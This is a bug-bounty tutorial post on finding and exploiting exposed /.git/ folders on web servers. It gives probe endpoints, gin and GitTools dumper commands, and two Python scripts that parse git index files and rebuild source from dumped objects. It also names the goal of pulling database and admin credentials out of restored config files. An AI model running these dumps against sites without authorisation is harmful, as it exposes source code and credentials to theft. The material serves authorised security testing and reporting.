Git Folder: Bug Bounty Tips

Wh11teW0lf
Nov 8, 2020
Bug Hunter found that /.git/ folder is public

Hello everyone! In this article I want to show you how to exploit an open /.git/ folder. Some of my reports were marked as Duplicate, and the researchers were unable to prove harm, which is why the reports were closed as Informative. But after my comments the state of the reports was changed from Informative to Low.

Discovery

How can we find an open git folder? These endpoints will help you:

/.git/
/.git/index
/.git/logs/
/.git/HEAD
/.git/logs/HEAD
/.git/logs/refs

If these endpoints respond with 200 OK, the target is most likely exposed. Check the response bodies before reporting, though: some servers answer every path with 200 and an error page or a single-page-app shell. A real /.git/HEAD contains a single line such as ref: refs/heads/master or a 40-character commit hash, and a real /.git/index starts with the bytes DIRC.

P.S. Actually, even if you can only access /.git/index, you can still exploit this!

Low impact

This will be the most common scenario in your practice. The /.git/index file lists every file tracked by the repository, which for a deployed web root is close to a complete map of what is on the target server (so if you find the index file open, your content discovery is almost done).

To extract the list of all paths we will use the Gin tool, which pretty-prints the binary index. Just download the index file, for example with wget, and execute the following command:

./gin <path-to-index-file> | grep "name = "

And... boom. The list of all tracked files is on your terminal screen:

Result of gin tool

From this stage you can already report this (exception: if you only receive a list of html, css and js files that are already served publicly, there is no real impact). But do not hurry!
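As an added example (not from the original post, and not the gin tool's code), the following Python reads /.git/index directly using the v2/v3 index layout from git's index-format documentation, and adds the /.git/HEAD sanity check from the Discovery section. The sample index is constructed inside the script itself; the list of file names in SENSITIVE is my own assumption of what to open first, not something from the post.

```python
import hashlib
import re
import struct

# /.git/HEAD is either a symbolic ref or a bare 40-hex commit id; anything else
# (an HTML 404 page served with 200, a SPA shell) is a false positive.
HEAD_RE = re.compile(r"^(ref: refs/\S+|[0-9a-f]{40})\s*$")

def looks_like_git_head(body: str) -> bool:
    return HEAD_RE.match(body) is not None

# Index entry fixed part (format v2/v3): ten uint32 fields, a 20-byte object id
# and a 16-bit flags word; the path follows, NUL-terminated and padded to 8 bytes.
ENTRY_FIXED = struct.Struct(">10I20sH")

def parse_git_index(data: bytes):
    """Return [(mode, object_id_hex, path), ...] from the bytes of /.git/index."""
    if data[:4] != b"DIRC":
        raise ValueError("not a git index (bad signature)")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):
        raise ValueError(f"unsupported index version {version}")
    # Trailing 20 bytes are SHA-1 over everything before them: catches a
    # truncated or HTML-wrapped download before we trust any path from it.
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated or not a raw index?)")
    entries, off = [], 12
    for _ in range(count):
        fields = ENTRY_FIXED.unpack_from(data, off)
        mode, object_id, flags = fields[6], fields[10], fields[11]
        extra = 2 if flags & 0x4000 else 0          # v3 "extended flags" word
        name_off = off + ENTRY_FIXED.size + extra
        name_len = flags & 0x0FFF                    # 0xFFF means "longer, read to NUL"
        if name_len < 0x0FFF:
            path = data[name_off:name_off + name_len]
        else:
            path = data[name_off:data.index(b"\0", name_off)]
        entry_len = ENTRY_FIXED.size + extra + len(path) + 1
        entry_len += (8 - entry_len % 8) % 8         # NUL padding to 8-byte boundary
        entries.append((mode, object_id.hex(), path.decode("utf-8", "replace")))
        off += entry_len
    return entries

# Names worth opening first once you have the listing (assumed patterns).
SENSITIVE = re.compile(
    r"(^|/)(wp-config\.php|\.env|config\.php|settings\.py|database\.yml"
    r"|[^/]*\.(pem|key|sql|bak))$", re.I)

def interesting_paths(entries):
    return [path for _, _, path in entries if SENSITIVE.search(path)]

def build_sample_index(paths):
    """Constructed sample: a minimal v2 index for the given paths (empty blobs)."""
    body = b"DIRC" + struct.pack(">II", 2, len(paths))
    empty_blob = hashlib.sha1(b"blob 0\0").digest()
    for path in sorted(paths):                       # git keeps entries sorted
        name = path.encode()
        entry = ENTRY_FIXED.pack(0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0,
                                 empty_blob, min(len(name), 0xFFF)) + name + b"\0"
        entry += b"\0" * ((8 - len(entry) % 8) % 8)
        body += entry
    return body + hashlib.sha1(body).digest()

if __name__ == "__main__":
    sample = build_sample_index(["index.php", "wp-config.php", "assets/app.js",
                                 "backup/site.sql"])
    listing = parse_git_index(sample)
    for mode, oid, path in listing:
        print(f"{mode:06o} {oid} {path}")
    print("look here first:", interesting_paths(listing))
```

Feed the downloaded file to parse_git_index to get the same listing that gin prints; the checksum check is the one thing gin's output does not tell you, and it is what distinguishes a real index from a 200 OK that wrapped the bytes in an error page.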

Medium/High impact

Impact depends on which of the listed files you can actually fetch from the target. Case from my practice: I successfully got access to one .php file that disclosed a list of all domains and subdomains of the target, which gave me 8 subdomain takeovers, PHP code injection and SQL injection on different resources of the company.

For high impact you can find API keys, tokens, user data, etc. So it only depends on what you can reach from the list of files that you receive from the gin tool.

Critical impact

In this case you need to restore the files from the git folder and get access to the source code. It often works with WordPress or other CMSs because you can restore configuration files that hold database credentials, salt keys and other critical information, or you can find vulnerabilities in the source code. My favorite tool for this is GitTools. Its dumper does not need directory listing: it fetches HEAD, the refs and the index, then follows the object hashes found in them to download the individual objects. To restore, navigate into the Dumper folder and execute the following command:

bash gitdumper.sh https://<address-here.com>/.git/ <output-folder>

Then navigate into the output folder and execute:

  1. git status
  2. git checkout -- .

git status will show every tracked file as deleted, because the dump contains only the .git directory and no working tree; git checkout -- . rebuilds the working tree from the downloaded objects. After that just print the source code of the files to your terminal. Note that not all files will be restored: any file whose blob object could not be downloaded (for example because it only exists inside a packfile under objects/pack) is skipped with an error, and git status will keep reporting it as deleted.
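As an added example (not part of the original post or of GitTools), the following Python does by hand what git checkout -- . does over a dumped .git directory: it follows HEAD to the branch ref, the commit to its root tree, and the tree to its blobs, reading each object the way git stores it (zlib-compressed "<type> <size>\0" followed by the content, named by the SHA-1 of those uncompressed bytes). The repository it walks is constructed in a temporary directory inside the script; the paths, file contents and the "hunter2" password are made up. It also shows the partial-dump case mentioned above: when one object was not fetched, the file it backs is reported as missing instead of aborting the whole restore.

```python
import hashlib
import os
import tempfile
import zlib

def object_path(gitdir, sha):
    return os.path.join(gitdir, "objects", sha[:2], sha[2:])

def write_loose(gitdir, kind, content):
    """Store one loose object as git does; used only to build the sample."""
    raw = f"{kind} {len(content)}".encode() + b"\0" + content
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.dirname(object_path(gitdir, sha)), exist_ok=True)
    with open(object_path(gitdir, sha), "wb") as fh:
        fh.write(zlib.compress(raw))
    return sha

def read_loose(gitdir, sha):
    """Return (kind, content), verifying hash and size header.
    Raises FileNotFoundError when the dumper never fetched the object."""
    with open(object_path(gitdir, sha), "rb") as fh:
        raw = zlib.decompress(fh.read())
    if hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError(f"object {sha} is corrupt")
    header, content = raw.split(b"\0", 1)
    kind, size = header.decode().split(" ")
    if int(size) != len(content):
        raise ValueError(f"object {sha} has a bad size header")
    return kind, content

def parse_tree(content):
    """Tree entries are '<mode> <name>\\0<20 raw sha bytes>' back to back."""
    entries, off = [], 0
    while off < len(content):
        nul = content.index(b"\0", off)
        mode, name = content[off:nul].decode().split(" ", 1)
        entries.append((mode, name, content[nul + 1:nul + 21].hex()))
        off = nul + 21
    return entries

def restore_tree(gitdir, tree_sha, prefix=""):
    """Map path -> bytes for every blob under tree_sha; collect missing ones."""
    files, missing = {}, []
    for mode, name, sha in parse_tree(read_loose(gitdir, tree_sha)[1]):
        path = prefix + name
        try:
            kind, content = read_loose(gitdir, sha)
        except FileNotFoundError:
            missing.append(path)
            continue
        if kind == "tree":
            sub_files, sub_missing = restore_tree(gitdir, sha, path + "/")
            files.update(sub_files)
            missing.extend(sub_missing)
        else:
            files[path] = content
    return files, missing

def resolve_head(gitdir):
    """HEAD is 'ref: refs/heads/<branch>' (read that file) or a detached sha."""
    with open(os.path.join(gitdir, "HEAD")) as fh:
        head = fh.read().strip()
    if head.startswith("ref: "):
        with open(os.path.join(gitdir, head[5:])) as fh:
            return fh.read().strip()
    return head

def restore_head(gitdir):
    """Follow HEAD -> commit -> root tree and rebuild the checked-in files."""
    kind, commit = read_loose(gitdir, resolve_head(gitdir))
    if kind != "commit":
        raise ValueError("HEAD does not point at a commit")
    tree_sha = commit.split(b"\n", 1)[0].split(b" ")[1].decode()   # 'tree <sha>'
    return restore_tree(gitdir, tree_sha)

def build_sample_repo(gitdir):
    """Constructed .git: two blobs, a subtree, one commit, one branch ref."""
    cfg = write_loose(gitdir, "blob", b"<?php define('DB_PASSWORD', 'hunter2');\n")
    db = write_loose(gitdir, "blob", b"<?php // db helper\n")
    inc = write_loose(gitdir, "tree", b"100644 db.php\0" + bytes.fromhex(db))
    root = write_loose(gitdir, "tree", b"40000 inc\0" + bytes.fromhex(inc)
                       + b"100644 wp-config.php\0" + bytes.fromhex(cfg))
    commit = write_loose(gitdir, "commit", (f"tree {root}\nauthor A <a@x> 0 +0000\n"
                         f"committer A <a@x> 0 +0000\n\ninitial\n").encode())
    os.makedirs(os.path.join(gitdir, "refs", "heads"), exist_ok=True)
    with open(os.path.join(gitdir, "refs", "heads", "master"), "w") as fh:
        fh.write(commit + "\n")
    with open(os.path.join(gitdir, "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    return {"commit": commit, "db": db}

def demo():
    """Restore the sample, then delete one blob to show the partial-dump case."""
    gitdir = tempfile.mkdtemp()
    shas = build_sample_repo(gitdir)
    full, _ = restore_head(gitdir)
    os.remove(object_path(gitdir, shas["db"]))   # as if the dumper got a 404 for it
    partial, missing = restore_head(gitdir)
    return full, partial, missing

if __name__ == "__main__":
    full, partial, missing = demo()
    print(sorted(full), "-> after losing one object, missing:", missing)
```

Objects that exist only inside a packfile are not addressable as objects/xx/yyyy, which is one reason a dump from a live site comes back incomplete; running git fsck in the dumped folder lists the missing objects, and git log --stat in the same folder shows which commits touched the files you care about even when their blobs are gone.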

Case: I successfully restored some files where I was able to find credentials for Basic Auth and admin credentials for a login form!

That's all!
